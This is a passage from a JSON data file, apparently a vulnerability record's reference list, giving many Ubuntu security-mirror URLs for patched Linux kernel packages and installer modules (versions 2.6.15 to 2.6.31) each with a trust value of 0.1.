        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
